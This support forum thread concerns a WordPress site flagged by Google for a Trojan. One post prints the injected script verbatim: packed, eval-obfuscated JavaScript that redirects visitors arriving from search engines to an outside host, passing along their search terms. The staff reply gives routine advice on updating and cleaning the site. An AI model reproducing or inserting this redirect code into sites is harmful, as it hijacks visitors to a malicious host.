Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #11786

    Our site was blocked from Google and flags a Trojan warning. I haven’t upgraded in awhile, could this be the issue? What other steps should I take?

    #73053

    Here’s the security hazard being flagged:

    <script language=”JavaScript”>eval(function(p,a,c,k,e,r){e=f

    unction(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?Strin

    g.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,Str

    ing)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e

    ]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.re

    place(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘e r=

    x.9,t=””,q;4(r.3(“m.”)!=-1)t=”q”;4(r.3(“7.”)!=-1)t=”q”;4(r.3

    (“8.”)!=-1)t=”p”;4(r.3(“a.”)!=-1)t=”q”;4(r.3(“f.”)!=-1)t=”g”

    ;4(r.3(“j.”)!=-1)t=”q”;4(t.6&&((q=r.3(“?”+t+”=”))!=-1||(q=r.

    3(“&”+t+”=”))!=-1))B.C=”v”+”w”+”:/”+”/A”+”b”+”k”+”5″+”h.”+”c

    “+”z/s”+”u”+”5″+”h.p”+”d?”+”t”+”y=1&t”+”i”+”l=”+r.n(q+2+t.6)

    .o(“&”)[0];’,39,39,’|||indexOf|if|rc|length|msn|yahoo|referr

    er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s

    ubstring|split||||||ea|ht|tp|document|||go|window|location’.

    split(‘|’),0,{}))</script>

    #73054

    Hi Eric,

    Yes, you should keep the theme, WordPress and any plugins you have installed up-to-date. Outdated software particularly with WordPress and plugins could lead to vulnerabilities that can be exploited.

    To update the theme, log into your account at ThemeForest and download the latest version. You can update plugins and WordPress through the Dashboard. My advice given the message you’ve received is to work with your web host to see if there are any infected files on your server and if so how to go about cleaning those before you start updating.

    Regards,

    Mya

Viewing 3 posts - 1 through 3 (of 3 total)

The topic ‘Theme security risk’ is closed to new replies.